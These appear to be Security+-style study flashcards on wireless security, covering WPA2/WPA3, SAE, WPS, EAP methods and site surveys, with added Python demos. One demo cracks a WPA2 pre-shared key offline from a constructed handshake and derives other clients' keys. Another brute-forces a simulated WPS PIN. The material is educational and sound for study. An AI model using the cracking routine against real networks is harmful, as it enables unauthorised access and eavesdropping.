3.4 Wireless Security Settings Flashcards
• An organization’s wireless network can contain confidential
information
– Not everyone is allowed access
• Authenticate the users before granting access
– Who gets access to the wireless network?
– Username, password, multi-factor authentication
• Ensure that all communication is confidential
– Encrypt the wireless data
• Verify the integrity of all communication
– The received data should be identical to the
original sent data
– A message integrity check (MIC)
Securing a wireless network
• All wireless computers are radio transmitters and receivers
– Anyone can listen in
• Solution: Encrypt the data - Everyone has an encryption key
• Only people with the right key can transmit and listen
– WPA2 and WPA3
Wireless encryption
• Wi-Fi Protected Access II (WPA2)
– WPA2 certification began in 2004
• CCMP block cipher mode
– Counter Mode with Cipher Block Chaining
– Message Authentication Code Protocol, or
– Counter/CBC-MAC Protocol
• CCMP security services
– Data confidentiality with AES
– Message Integrity Check (MIC) with CBC-MAC
WPA2 and CCMP
• Wi-Fi Protected Access 3 (WPA3)
– Introduced in 2018
• GCMP block cipher mode
– Galois/Counter Mode Protocol
– A stronger cipher suite than WPA2’s CCMP
– Required (as GCMP-256) in the WPA3-Enterprise 192-bit
mode; WPA3-Personal still uses CCMP-128 by default
• GCMP security services
– Data confidentiality with AES
– Message Integrity Check (MIC) with
Galois Message Authentication Code (GMAC)
WPA3 and GCMP
• WPA2 has a PSK brute-force problem
– Listen to the four-way handshake
– Or skip the handshake: the PMKID in the first
EAPOL frame can be captured with no client present
– Capture the handshake or the PMKID
• With the capture, attackers can brute force the
pre-shared key (PSK) offline
– The access point never sees the guesses
• This has become easier as technology improves
– A weak PSK is easier to brute force
– GPU processing speeds
– Cloud-based password cracking
• Once you have the PSK, you have everyone’s
wireless key
– There’s no forward secrecy: the PSK plus the MAC
addresses and nonces visible in any captured
handshake yields that client’s session keys
The WPA2 PSK problem
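Worked example (added here; it is not part of the original flashcards and is not any tool’s code) of the two points above: a captured four-way handshake is enough to test passphrase guesses offline, and once the PSK is known, every client’s per-session keys follow from values that travel in the clear. The SSID, MAC addresses, nonces, EAPOL frame body and wordlist are all constructed for the demo; the key derivation itself (PBKDF2 for the PMK, the 802.11 PRF-512 for the PTK, HMAC-SHA1-128 for the EAPOL MIC) is the WPA2 algorithm.

```python
"""WPA2-PSK: offline PSK cracking from a captured handshake, and the
absence of forward secrecy. All network values below are constructed."""
import hashlib
import hmac
from typing import Optional

SSID = b"corp-wifi"                       # constructed network name
AP_MAC = bytes.fromhex("a0b1c2d3e4f5")    # constructed authenticator address
WORDLIST = ["password", "letmein", "summer2024", "correcthorse"]  # constructed


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK: the PMK *is* the PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512. Every input except the PMK is visible to a sniffer."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]          # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def make_capture(passphrase: str, sta: bytes, anonce: bytes, snonce: bytes) -> dict:
    """What a sniffer records: MACs, nonces, the message-2 body and its MIC.
    The real passphrase is used only here, to produce the MIC the AP accepts."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, sta, anonce, snonce)
    eapol2 = b"\x02\x03\x00\x75" + b"\x02\x01\x0a" + snonce + b"\x00" * 40  # constructed body, MIC field zeroed
    return {"ssid": SSID, "ap": AP_MAC, "sta": sta, "anonce": anonce,
            "snonce": snonce, "eapol2": eapol2, "mic": eapol_mic(ptk[:16], eapol2)}


def crack_psk(cap: dict, wordlist) -> Optional[str]:
    """Offline attack: 4096 PBKDF2 rounds per guess, zero packets sent to the AP."""
    for cand in wordlist:
        pmk = pmk_from_passphrase(cand, cap["ssid"])
        ptk = ptk_from_pmk(pmk, cap["ap"], cap["sta"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], cap["eapol2"]), cap["mic"]):
            return cand
    return None


def temporal_key_from_psk(passphrase: str, cap: dict) -> bytes:
    """No forward secrecy: the recovered PSK plus any client's public handshake
    values gives that client's TK, so its CCMP traffic can be decrypted."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, cap["ssid"]),
                       cap["ap"], cap["sta"], cap["anonce"], cap["snonce"])
    return ptk[32:48]


# Two constructed client sessions on the same network, same PSK.
CAP_ALICE = make_capture("summer2024", bytes.fromhex("101112131415"),
                         bytes(range(32)), bytes(range(32, 64)))
CAP_BOB = make_capture("summer2024", bytes.fromhex("202122232425"),
                       bytes(range(64, 96)), bytes(range(96, 128)))

if __name__ == "__main__":
    found = crack_psk(CAP_ALICE, WORDLIST)
    print("recovered PSK:", found)
    print("Bob's TK, derived from Alice's cracked PSK:", temporal_key_from_psk(found, CAP_BOB).hex())
```

The only cost per guess is the 4096-round PBKDF2; a GPU cracker does exactly this loop in parallel. Note that Bob’s traffic falls with Alice’s handshake: nothing in his session was ever secret from someone who knows the PSK.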
• WPA3 changes the PSK authentication process
– Includes mutual authentication
– Creates a shared session key without sending that
key across the network
– The four-way handshake still runs, but its PMK now
comes from SAE rather than straight from the PSK,
so a captured handshake gives nothing to crack offline
– Adds perfect forward secrecy
• Simultaneous Authentication of Equals (SAE)
– A Diffie-Hellman derived key exchange with an
authentication component (a password-authenticated
key exchange)
– Everyone uses a different session key, even with
the same PSK
– Specified in IEEE 802.11 (first in 802.11s), built on
the Dragonfly handshake (RFC 7664)
– Guessing is now one online attempt per guess: a weak
passphrase is still weak, just not crackable from a capture
SAE
• Gain access to a wireless network
– Mobile users
– Temporary users
• Credentials
– Shared password / pre-shared key (PSK)
– Centralized authentication (802.1X)
• Configuration
– Part of the wireless network connection
– Prompted during the connection process
Wireless authentication methods
• Configure the authentication on your wireless
access point / wireless router
• Open System
– No password is required
• WPA3-Personal / WPA3-PSK
– WPA3 with a pre-shared key
– Everyone uses the same key
– Unique WPA3 session key is derived from the PSK
using SAE (Simultaneous Authentication of Equals)
• WPA3-Enterprise / WPA3-802.1X
– Authenticates users individually with an
authentication server (e.g., RADIUS)
Wireless security modes
• Authentication to a network - Common on wireless networks
• Access table recognizes a lack of authentication
– Redirects your web access to a captive portal page
• Username / password - And additional authentication factors
• Once proper authentication is provided, the
web session continues
– Until the captive portal removes your access
Captive Portal
• Wi-Fi Protected Setup
– Originally called Wi-Fi Simple Config
• Allows “easy” setup of a mobile device
– A passphrase can be complicated to a novice
• Different ways to connect
– PIN configured on access point must be entered
on the mobile device
– Push a button on the access point
– Near-field communication
– Bring the mobile device close to the access point
Using WPS
• December 2011 - WPS has a design flaw
– It was built wrong from the beginning
• PIN is an eight-digit number
– Really seven digits and a checksum
– Seven digits, 10,000,000 possible combinations
• The WPS process validates each half of the PIN
– First half, 4 digits. Second half, 3 digits plus the
checksum, which the attacker can compute
– First half, 10,000 possibilities,
second half, 1,000 possibilities
– 11,000 guesses at most, and the access point tells
you which half was wrong
• It takes about four hours to go through all of them
– Most devices never considered a lockout function
– Brute force lockout features are now the norm
– Safest option is still to disable the PIN method
The WPS hack
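Worked example (added here; not from the flashcards and not a real WPS implementation) of the arithmetic behind the WPS PIN flaw: the checksum digit is computable, and because the registrar acknowledges the two halves separately, the search is 10,000 + 1,000 guesses rather than 10,000,000. The `WpsRegistrar` class is a simulation of the M4/M6 accept-or-NACK behaviour, including the optional lockout that vendors later added; the ~1.3 seconds per attempt figure is an assumption used only to reproduce the "about four hours" estimate.

```python
"""WPS PIN: checksum, split-half brute force, and the effect of a lockout.
The registrar is a simulation of the protocol's observable behaviour only."""


def wps_checksum(body: int) -> int:
    """Eighth PIN digit per the WPS spec: weighted digit sum of the 7-digit body."""
    acc, n = 0, body
    while n:
        acc += 3 * (n % 10)   # digits 7, 5, 3, 1 (counting from the left) weigh 3
        n //= 10
        acc += n % 10         # digits 6, 4, 2 weigh 1
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class WpsRegistrar:
    """Models the M4/M6 exchange: the AP NACKs after M4 if the first half is wrong
    and after M6 if the second half is wrong, so each half is confirmed on its own.
    max_failures models a vendor lockout (None = no lockout, the 2011 situation)."""

    def __init__(self, pin: str, max_failures=None):
        assert is_valid_pin(pin)
        self._pin, self._max, self.failures = pin, max_failures, 0

    def _fail(self) -> bool:
        self.failures += 1
        if self._max is not None and self.failures >= self._max:
            raise RuntimeError("WPS locked out after too many failed PIN attempts")
        return False

    def try_first_half(self, half: str) -> bool:
        return True if half == self._pin[:4] else self._fail()

    def try_second_half(self, first: str, half: str) -> bool:
        return True if (first, half) == (self._pin[:4], self._pin[4:]) else self._fail()


def brute_force_wps(reg: WpsRegistrar):
    """Returns (pin, attempts). Worst case is 10,000 + 1,000 = 11,000 online attempts."""
    attempts = 0
    first = None
    for a in range(10_000):
        attempts += 1
        if reg.try_first_half(f"{a:04d}"):
            first = f"{a:04d}"
            break
    if first is None:
        return None, attempts
    for b in range(1_000):                       # only 3 free digits: checksum is derived
        attempts += 1
        second = f"{b:03d}" + str(wps_checksum(int(first + f"{b:03d}")))
        if reg.try_second_half(first, second):
            return first + second, attempts
    return None, attempts


def hours_for_full_search(seconds_per_attempt: float = 1.3) -> float:
    """Assumed ~1.3 s per attempt: 11,000 guesses is roughly four hours."""
    return 11_000 * seconds_per_attempt / 3600


if __name__ == "__main__":
    pin, tries = brute_force_wps(WpsRegistrar("12345670"))   # constructed target PIN
    print(f"recovered {pin} after {tries} attempts (worst case 11000, naive 10000000)")
    print(f"full search at 1.3 s/attempt: {hours_for_full_search():.1f} h")
```

With `max_failures` set, the same loop raises a lockout well before the first half is found, which is all the mitigation does: it does not fix the protocol, it just makes the 11,000 guesses slow enough to be impractical.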
• We’ve created many authentication methods
through the years
– A network administrator has many choices
• Use a username and password
– Other factors can be included
• Commonly used on wireless networks
– Also works on wired networks
Wireless authentication
• Extensible Authentication Protocol (EAP)
– An authentication framework
• Many different ways to authenticate based on
RFC standards
– Manufacturers can build their own EAP methods
• EAP integrates with 802.1X
– Prevents access to the network until the
authentication succeeds
EAP
• IEEE 802.1X
– Port-based Network Access Control (NAC)
– You don’t get access to the network until you
authenticate
• Used in conjunction with an access database
– RADIUS, LDAP, TACACS+
IEEE 802.1X
• Supplicant
– The client
• Authenticator
– The device that provides access
• Authentication server
– Validates the client credentials
IEEE 802.1X and EAP
• EAP Flexible Authentication via Secure Tunneling
– Authentication server (AS) and supplicant share a
protected access credential (PAC) (shared secret)
• Supplicant receives the PAC
• Supplicant and AS mutually authenticate and
negotiate a Transport Layer Security (TLS) tunnel
• User authentication occurs over the TLS tunnel
• Need a RADIUS server
– Provides the authentication database and
EAP-FAST services
EAP-FAST
• Protected Extensible Authentication Protocol
– Protected EAP
– Created by Cisco, Microsoft, and RSA Security
• Also encapsulates EAP in a TLS tunnel
– AS uses a digital certificate instead of a PAC
– Client doesn’t use a certificate
• User authenticates with MSCHAPv2
– Authenticates against Windows credential stores
such as Active Directory
– The supplicant must validate the AS certificate;
otherwise a rogue access point presenting its own
certificate can collect MS-CHAPv2 challenge/responses
• User can also authenticate with a GTC
– Generic Token Card, hardware token generator
PEAP
• EAP Transport Layer Security
– Strong security, wide adoption
– Support from most of the industry
• Requires digital certificates on the AS and all other devices
– AS and supplicant exchange certificates for
mutual authentication
– TLS tunnel is then built for the user
authentication process
• Relatively complex implementation
– Need a public key infrastructure (PKI)
– Must deploy and manage certificates to all wireless clients
– Not all devices can support the use of digital certificates
EAP-TLS
• EAP Tunneled Transport Layer Security
– Support other authentication protocols
in a TLS tunnel
• Requires a digital certificate on the AS
– Does not require digital certificates on every device
– Builds a TLS tunnel using this digital certificate
• Use any authentication method inside the TLS tunnel
– Other EAPs
– MSCHAPv2
– Anything else
EAP-TTLS
• Use RADIUS with federation
– Members of one organization can authenticate to
the network of another organization
– Use their normal credentials
• Use 802.1X as the authentication method
– And RADIUS on the backend - EAP to authenticate
• Driven by eduroam (education roaming)
– Educators can use their normal authentication
when visiting a different campus
– https://www.eduroam.org/
RADIUS Federation
• Determine existing wireless landscape
– Sample the existing wireless spectrum
• Identify existing access points
– You may not control all of them
• Work around existing frequencies
– Layout and plan for interference
• Plan for ongoing site surveys
– Things will certainly change
• Heat maps
– Identify wireless signal strengths
Site surveys
• Signal coverage
• Potential interference
• Built-in tools
• 3rd-party tools
• Spectrum analyzer
Wireless survey tools
• Wireless networks are incredibly easy to monitor
– Everyone “hears” everything
• You have to be quiet
– You can’t hear the network if you’re busy transmitting
• Some network drivers won’t capture wireless information
– You’ll need specialized adapters/chipsets and drivers
• View wireless-specific information
– Signal-to-noise ratio, channel information, etc.
• Try it yourself! - https://www.wireshark.org
Wireless packet analysis
• Overlapping channels
– Frequency conflicts - use non-overlapping channels
– Automatic or manual configurations
Channel selection and overlaps
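Worked example (added here; not part of the original flashcards) of the arithmetic behind "use non-overlapping channels" in the 2.4 GHz band, and of using a site-survey listing to pick the least-congested one. The neighbour list is constructed; the channel spacing (5 MHz) and the 22 MHz channel footprint are the 802.11 2.4 GHz figures, and the result is the familiar 1/6/11 plan.

```python
"""2.4 GHz channel overlap and channel selection from a (constructed) survey."""
from typing import Dict, Iterable, List, Tuple

CHANNEL_WIDTH_MHZ = 22   # 802.11b/g channel footprint; centres are only 5 MHz apart


def center_mhz(ch: int) -> int:
    """2.4 GHz band: channel n is centred at 2407 + 5n MHz (channels 1-13)."""
    if not 1 <= ch <= 13:
        raise ValueError("only channels 1-13 are modelled")
    return 2407 + 5 * ch


def overlaps(a: int, b: int, width: int = CHANNEL_WIDTH_MHZ) -> bool:
    """Two channels interfere unless their centres are at least one channel width apart."""
    return abs(center_mhz(a) - center_mhz(b)) < width


def non_overlapping_plan(channels: Iterable[int], width: int = CHANNEL_WIDTH_MHZ) -> List[int]:
    """Greedy pick of mutually non-overlapping channels from the allowed list."""
    chosen: List[int] = []
    for ch in sorted(channels):
        if all(not overlaps(ch, c, width) for c in chosen):
            chosen.append(ch)
    return chosen


def least_congested(survey: Iterable[int], candidates=(1, 6, 11)) -> Tuple[int, Dict[int, int]]:
    """survey: channel of each neighbouring AP seen in a scan. Score each candidate by
    how many neighbours *overlap* it (adjacent-channel interference counts), not just
    how many sit on the same channel; ties go to the lower channel number."""
    scores = {c: sum(overlaps(c, n) for n in survey) for c in candidates}
    best = min(candidates, key=lambda c: (scores[c], c))
    return best, scores


SURVEY = [1, 1, 2, 6, 11, 11, 11, 13]   # constructed neighbour list from a scan

if __name__ == "__main__":
    print("non-overlapping in channels 1-11:", non_overlapping_plan(range(1, 12)))
    best, scores = least_congested(SURVEY)
    print("overlap scores:", scores, "-> use channel", best)
```

The score treats a neighbour on channel 2 as interfering with channel 1 and channel 6 alike, which is the point of the slide: an AP on channel 3 "between" two of yours hurts both, so surveys should be read for overlap, not just for identical channel numbers.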